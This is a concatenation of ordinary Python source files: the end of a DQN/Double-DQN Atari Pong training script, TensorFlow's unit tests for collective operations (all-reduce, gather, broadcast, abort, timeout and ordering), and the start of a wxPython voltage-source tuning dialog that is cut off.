constructor=tf.train.AdamOptimizer,
kwargs=dict(epsilon=1e-4),
lr_schedule=lr_schedule
)
def stopping_criterion(env, t):
# notice that here t is the number of steps of the wrapped env,
# which is different from the number of steps in the underlying env
return get_wrapper_by_name(env, "Monitor").get_total_steps() >= num_timesteps
exploration_schedule = PiecewiseSchedule(
[
(0, 1.0),
(1e6, 0.1),
(num_iterations / 2, 0.01),
], outside_value=0.01
)
dqn.learn(
env=env,
q_func=atari_model,
optimizer_spec=optimizer,
session=session,
exploration=exploration_schedule,
stopping_criterion=stopping_criterion,
replay_buffer_size=1000000,
batch_size=32,
gamma=0.99,
learning_starts=50000,
learning_freq=4,
frame_history_len=4,
target_update_freq=10000,
grad_norm_clipping=10,
double_q=double,
logdir=os.path.join(logdir,'%d'%seed)
)
env.close()
def get_available_gpus():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.physical_device_desc for x in local_device_protos if x.device_type == 'GPU']
def set_global_seeds(i):
try:
import tensorflow as tf
except ImportError:
pass
else:
tf.set_random_seed(i)
np.random.seed(i)
random.seed(i)
def get_session():
tf.reset_default_graph()
tf_config = tf.ConfigProto(
inter_op_parallelism_threads=1,
intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True
session = tf.Session(config=tf_config)
print("AVAILABLE GPUS: ", get_available_gpus())
return session
def get_env(task, seed):
env = gym.make('PongNoFrameskip-v4')
set_global_seeds(seed)
env.seed(seed)
expt_dir = '/tmp/hw3_vid_dir2/'
env = wrappers.Monitor(env, os.path.join(expt_dir, "gym"), force=True)
env = wrap_deepmind(env)
return env
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--env_name', type=str, default='PongNoFrameskip-v4')
args = parser.parse_args()
data_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data')
if not (os.path.exists(data_path)):
os.makedirs(data_path)
processes = []
for double in [True, False]:
def train_func():
alg_name = 'ddqn' if double else 'dqn'
logdir = args.env_name + '_' + alg_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join(data_path, logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
# Get Atari games.
task = gym.make(args.env_name)
# Run training
seed = random.randint(0, 9999)
print('random seed = %d' % seed)
env = get_env(task, seed)
session = get_session()
atari_learn(env, session, double, logdir, seed, num_timesteps=2e8)
p = Process(target=train_func)
p.start()
processes.append(p)
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
collective_ops_test.py
|
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for V2 Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.python.compat import v2_compat
from tensorflow.python.data.experimental.ops import testing as dataset_testing
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import test_util
from tensorflow.python.eager import cancellation
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import collective_ops as _collective_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.platform import test
class CollectiveOpsV1(object):
all_reduce = _collective_ops.all_reduce
all_gather = _collective_ops.all_gather
broadcast_send = _collective_ops.broadcast_send
broadcast_recv = _collective_ops.broadcast_recv
class CollectiveOpsV2(object):
@staticmethod
def all_reduce(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_reduce_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def all_gather(t, group_size, group_key, instance_key, *args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.all_gather_v2(t, group_size, group_key, instance_key,
*args, **kwargs)
@staticmethod
def broadcast_send(t, shape, dtype, group_size, group_key, instance_key,
*args, **kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
return _collective_ops.broadcast_send_v2(t, group_size, group_key,
instance_key, *args, **kwargs)
@staticmethod
def broadcast_recv(shape, dtype, group_size, group_key, instance_key, *args,
**kwargs):
group_size = array_ops.identity(group_size)
group_key = array_ops.identity(group_key)
instance_key = array_ops.identity(instance_key)
shape = array_ops.identity(shape)
return _collective_ops.broadcast_recv_v2(
shape, dtype, group_size, group_key, instance_key, *args, **kwargs)
device_combination = (
combinations.combine(device='CPU', communication='RING', required_gpus=0) +
combinations.combine(
device='GPU', communication=['RING', 'NCCL'], required_gpus=2))
collective_op_combinations = combinations.combine(collective_op=[
combinations.NamedObject('all_reduce', CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2', CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather', CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2', CollectiveOpsV2.all_gather)
])
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v1', CollectiveOpsV1),
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager'), device_combination))
class CollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
def testGather(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_gather_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
return collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def run_all_gather_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_gather(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_gather_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_gather_2devices():
self.assertAllClose(result, [1., 1.], rtol=1e-5, atol=1e-5)
def testBroadcast(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_broadcast_2devices():
shape = [3]
in_value = constant_op.constant([1., 2., 3.], shape=shape)
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.broadcast_send(
in_value,
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.broadcast_recv(
shape,
in_value.dtype,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
for result in run_broadcast_2devices():
self.assertAllClose(result, [1., 2., 3.], rtol=1e-5, atol=1e-5)
def testInstanceKeyScopedUnderGroupKey(self, collective_ops, device,
communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
dev2 = '/device:%s:2' % device
dev3 = '/device:%s:3' % device
@def_function.function
def run_all_reduce_4devices_same_instance_key():
# Use a common instance key for both groups.
instance_key = 0
# We will create 2 groups each with 2 devices.
group_size = 2
# Group 0 comprises dev0 and dev1.
group0_key = 0
# Group 1 comprises dev2 and dev3.
group1_key = 1
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(1.), group_size, group0_key, instance_key))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(2.), group_size, group0_key, instance_key))
with ops.device(dev2):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(3.), group_size, group1_key, instance_key))
with ops.device(dev3):
collectives.append(
collective_ops.all_reduce(
constant_op.constant(4.), group_size, group1_key, instance_key))
return collectives
results = run_all_reduce_4devices_same_instance_key()
self.assertAllClose(results[0], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[1], 3., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[2], 7., rtol=1e-5, atol=1e-5)
self.assertAllClose(results[3], 7., rtol=1e-5, atol=1e-5)
def testCollectiveGroupSizeOne(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key=100,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with ops.device(dev0):
gathered_tensor = collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key=200,
communication_hint=communication)
self.assertAllEqual(in_value, gathered_tensor.numpy())
def testCollectiveInvalidKey(self, collective_ops, device, communication):
dev0 = '/device:%s:0' % device
group_size = 1
group_key = 100
instance_key = 100
in_value = [1., 2., 3., 4.]
in_tensor = constant_op.constant(in_value)
with ops.device(dev0):
reduced_tensor = collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
self.assertAllEqual(in_value, reduced_tensor.numpy())
with self.assertRaisesRegex(
errors.InternalError, 'instance 100 expected type 0 and data_type 1 but'
' got type 2 and data_type 1'):
with ops.device(dev0):
collective_ops.all_gather(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testMultipleGroups(self, collective_ops, device, communication):
if device == 'GPU' and context.num_gpus() < 4:
self.skipTest('not enough GPU')
num_elements = 4
@def_function.function
def run_all_reduce(group_size, group_key):
instance_key = group_key
input_value = [float(group_key) for i in range(num_elements)]
collectives = []
for device_idx in range(group_size):
with ops.device('/{}:{}'.format(device, device_idx)):
input_tensor = constant_op.constant(input_value)
collectives.append(
collective_ops.all_reduce(
input_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
def run_and_assert(group_size, group_key):
for reduced_tensor in run_all_reduce(group_size, group_key):
self.assertAllEqual(
[float(group_key) * group_size for i in range(num_elements)],
reduced_tensor.numpy())
run_and_assert(group_size=2, group_key=1)
run_and_assert(group_size=3, group_key=2)
@combinations.generate(
combinations.times(
combinations.combine(
collective_ops=[
combinations.NamedObject('v2', CollectiveOpsV2)
],
mode='eager',
max_subdivs_per_device=[-1, 0, 16]), device_combination))
class AllReduceWithSubdivisionsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testReduce(self, collective_ops, device, communication,
max_subdivs_per_device):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
@def_function.function
def run_all_reduce_1device():
with ops.device(dev0):
in_value = constant_op.constant([1.])
group_size = 1
group_key = 1
instance_key = 1
if max_subdivs_per_device == -1:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication)
else:
return collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication,
max_subdivs_per_device=max_subdivs_per_device)
@def_function.function
def run_all_reduce_2devices():
in_value = constant_op.constant([1.])
group_size = 2
group_key = 2
instance_key = 2
collectives = []
with ops.device(dev0):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
with ops.device(dev1):
collectives.append(
collective_ops.all_reduce(
in_value,
group_size,
group_key,
instance_key,
communication_hint=communication))
return collectives
self.assertAllClose(run_all_reduce_1device(), [1.], rtol=1e-5, atol=1e-5)
for result in run_all_reduce_2devices():
self.assertAllClose(result, [2.], rtol=1e-5, atol=1e-5)
@combinations.generate(
combinations.combine(required_physical_gpus=2, mode='eager'))
class XlaTest(test.TestCase, parameterized.TestCase):
def testReduce(self):
device0 = '/device:GPU:0'
device1 = '/device:GPU:1'
group_size = 2
group_key = 100
instance_key = 100
results = []
def all_reduce(device):
@def_function.function(jit_compile=True)
def f():
return _collective_ops.all_reduce_v2([1.], group_size, group_key,
instance_key)
with ops.device(device):
results.append(f())
t0 = threading.Thread(target=all_reduce, args=(device0,))
t1 = threading.Thread(target=all_reduce, args=(device1,))
t0.start()
t1.start()
t0.join()
t1.join()
self.assertAllEqual(results, [[2.], [2.]])
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testAbortGroupParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
def testAbortInstanceParamsResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# First perform a normal all-reduce to complete the group resolution.
def_function.function(collective_fn)()
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
context._reset_context() # pylint: disable=protected-access
t.join()
# Reset the context in order to reset the collective executor.
_setup_context()
# After reset non-NCCL collectives should work.
def_function.function(collective_fn)()
def testAbortCommunication(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal collective to finish resolution.
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def_function.function(collective_fn)()
# Launch a collective that hangs, and abort the collective executor after
# the launch.
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, 'peer down')
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, 'peer down'):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Reset the context in order to reset the collective executor.
t.join()
_setup_context()
def_function.function(collective_fn)()
class OpCancellationTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortIfNoCollective(self, collective_op, device,
communication):
# Do not abort if there's no active collective ops. There could be
# exceptions like EOF which we expect users to catch, aborting collective
# ops on all op errors intervenes with this workflow.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
dataset = dataset_ops.Dataset.from_tensors([1.])
@def_function.function
def collective_fn(in_tensor):
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@def_function.function
def f():
iterator = iter(dataset)
collective_fn(next(iterator))
# This next(iterator) should raise EOF.
collective_fn(next(iterator))
with self.assertRaises(errors.OutOfRangeError):
f()
collective_fn(constant_op.constant([1.]))
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce',
CollectiveOpsV1.all_reduce),
combinations.NamedObject('all_gather',
CollectiveOpsV1.all_gather),
],
mode='eager'), device_combination))
def testOpErrorAbortWithCollective(self, collective_op, device,
communication):
# Abort v1 collective ops if there're active collective ops at the time of
# an op error. This is due to the inability to cancel collective ops, and op
# errors may cause running collective ops to hang.
dev0 = '/device:%s:0' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test abortion
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Now collective ops is aborted, subsequent collective ops should fail with
# the previous error.
with self.assertRaises(errors.CancelledError):
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testOpErrorNotAbortWithCollective(self, collective_op, device,
communication):
# Do not abort v2 collective ops even if there're active collective ops at
# the time of an op error. We rely cancellation to terminate active
# collective ops.
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
@def_function.function
def collective_fn():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# Local params resolution cannot be cancelled yet, so we perform a normal
# collective so that the group is resolved.
collective_fn()
# Make the dataset sleep a while so that the collective is being executed
# when the EOF happens.
dataset = dataset_ops.Dataset.from_tensors([1.]).apply(
dataset_testing.sleep(sleep_microseconds=200))
@def_function.function
def f():
# Launch a collective op that won't be able to finish to test cancellation
# when other ops error.
with ops.device(dev0):
ret = collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
iterator = iter(dataset)
next(iterator)
# This should raise EOF.
next(iterator)
return ret
with self.assertRaises(errors.OutOfRangeError):
f()
# Collective ops shouldn't be aborted and new collectives should be able to
# proceed.
collective_fn()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
def testCancelDuringParamResolution(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
t1_cancellation_manager = cancellation.CancellationManager()
t2_cancellation_manager = cancellation.CancellationManager()
@def_function.function
def _collective_fn(x):
# Run an assertion to crash one of the two function executions running
# collectives. We explicitly cancel the other in response.
assert_op = check_ops.assert_equal(x, in_tensor)
with ops.control_dependencies([assert_op]):
return collective_op(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
collective_concrete = _collective_fn.get_concrete_function(in_tensor)
finish_mu = threading.Lock()
finishes = 0
def _placement_wrapper(device, x, my_cancellation, other_cancellation):
try:
with ops.device(device):
cancelable_collective = my_cancellation.get_cancelable_function(
collective_concrete)
return cancelable_collective(x)
except errors.InvalidArgumentError:
# `assert_equal` failed for this execution of the function. The other
# function would deadlock without cancellation.
other_cancellation.start_cancel()
except errors.CancelledError:
pass
nonlocal finishes
with finish_mu:
finishes += 1
t1 = threading.Thread(
target=_placement_wrapper,
args=(dev0, constant_op.constant([1.]), t1_cancellation_manager,
t2_cancellation_manager))
t2 = threading.Thread(
target=_placement_wrapper,
# Will cause the assertion to fail
args=(dev1, constant_op.constant([2.]), t2_cancellation_manager,
t1_cancellation_manager))
t1.start()
t2.start()
t1.join()
t2.join()
self.assertEqual(finishes, 2)
@combinations.generate(
combinations.times(collective_op_combinations, device_combination))
class TimeoutTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testTimeout(self, collective_op, device, communication):
timeout = 1.5
@def_function.function
def run(group_size, reported_group_size=None):
group_key = 20
instance_key = 30
tensor = [1., 2., 3., 4.]
results = []
if reported_group_size is None:
reported_group_size = group_size
for i in range(group_size):
with ops.device('/{}:{}'.format(device, i)):
input_data = constant_op.constant(tensor)
result = collective_op(
input_data,
group_size=reported_group_size,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
results.append(result)
return results
run(2, 2)
start_time = time.time()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
run(1, 2)
elapsed = time.time() - start_time
self.assertAllGreaterEqual(elapsed, timeout)
def testParamResolutionAfterTimeout(self, collective_op, device,
communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
# This timeout comes from param solution.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(
errors.DeadlineExceededError,
'Collective has timed out waiting for other workers'):
with ops.device(dev1):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
def testExecutionAfterTimeout(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
timeout = 1.5
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# Run a normal all-reduce to complete param resolution.
run()
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev0):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication,
timeout=timeout)
# We launch the second device after the first device times out. This is to
# simulate the situation when other workers are slow and the timeout is
# short. It should error immediately.
with self.assertRaisesRegex(errors.DeadlineExceededError,
'Collective has timed out during execution'):
with ops.device(dev1):
# No timeout.
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint=communication)
class CommunicationHintTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
@combinations.generate(
combinations.times(collective_op_combinations,
combinations.combine(required_gpus=[0, 1])))
def testNCCLFallbackOnCPU(self, collective_op):
# communication_hint=NCCL should work for CPU by falling back to RING. The
# test doesn't actually require GPU, only GPU builds. We specify
# required_gpus=1 so that it's tested with GPU builds.
dev0 = '/device:CPU:0'
dev1 = '/device:CPU:1'
group_key = 20
instance_key = 30
input_data = constant_op.constant([1., 2., 3., 4.])
@def_function.function
def run():
for device in [dev0, dev1]:
with ops.device(device):
collective_op(
input_data,
group_size=2,
group_key=group_key,
instance_key=instance_key,
communication_hint='NCCL')
run()
@combinations.generate(
combinations.times(
combinations.combine(
collective_op=[
combinations.NamedObject('all_reduce_v2',
CollectiveOpsV2.all_reduce),
combinations.NamedObject('all_gather_v2',
CollectiveOpsV2.all_gather),
],
mode='eager'), device_combination))
class OrderingTest(test.TestCase, parameterized.TestCase):
def setUp(self):
_setup_context()
super().setUp()
def testOrdering(self, collective_op, device, communication):
dev0 = '/device:%s:0' % device
dev1 = '/device:%s:1' % device
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
with ops.device(dev0):
token0 = resource_variable_ops.ResourceVariable(0.)
with ops.device(dev1):
token1 = resource_variable_ops.ResourceVariable(0.)
@def_function.function
def f():
# Launch the first collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
# Launch the second collective without token.
with ops.device(dev0):
collective_op(in_tensor, group_size, group_key, instance_key)
with ops.device(dev1):
collective_op(in_tensor, group_size, group_key, instance_key)
# Launch the third collective with token.
with ops.device(dev0):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token0.handle)
with ops.device(dev1):
collective_op(
in_tensor,
group_size,
group_key,
instance_key,
ordering_token=token1.handle)
graph = f.get_concrete_function().graph
for device in [dev0, dev1]:
# Try to find the third collective, which should have the first collective
# as a control input.
third = None
for op in graph.get_operations():
if (op.type.startswith('Collective') and op.device.endswith(device) and
op.control_inputs and
op.control_inputs[0].type.startswith('Collective')):
self.assertIsNone(third)
third = op
self.assertIsNotNone(third)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in third.inputs))
first = third.control_inputs[0]
self.assertEqual(third.device, first.device)
# Verify it's not the second collective by looking at the inputs.
self.assertTrue(any(v.dtype == dtypes.resource for v in first.inputs))
self.assertEmpty(first.control_inputs)
class InputPipelineTest(test.TestCase):
def setUp(self):
super().setUp()
_setup_context()
def testMap(self):
group_size = 2
group_key = 100
instance_key = 100
def create_dataset_and_fetch_one(t):
dataset = dataset_ops.Dataset.from_tensor_slices([t])
def reduce_fn(t):
return CollectiveOpsV2.all_reduce(
t,
group_size=group_size,
group_key=group_key,
instance_key=instance_key)
dataset = dataset.map(reduce_fn)
return next(iter(dataset))
@def_function.function
def f():
with ops.device('CPU:0'):
value0 = create_dataset_and_fetch_one([1.])
with ops.device('CPU:1'):
value1 = create_dataset_and_fetch_one([2.])
return value0, value1
self.assertAllEqual(self.evaluate(f()), [[3.], [3.]])
def _setup_context():
context._reset_context()
test_util.set_logical_devices_to_at_least('CPU', 4)
context.ensure_initialized()
if __name__ == '__main__':
os.environ['NCCL_DEBUG'] = 'INFO'
v2_compat.enable_v2_behavior()
test.main()
|
voltage_source.py
|
from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a VoltageSource.
"""
class VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
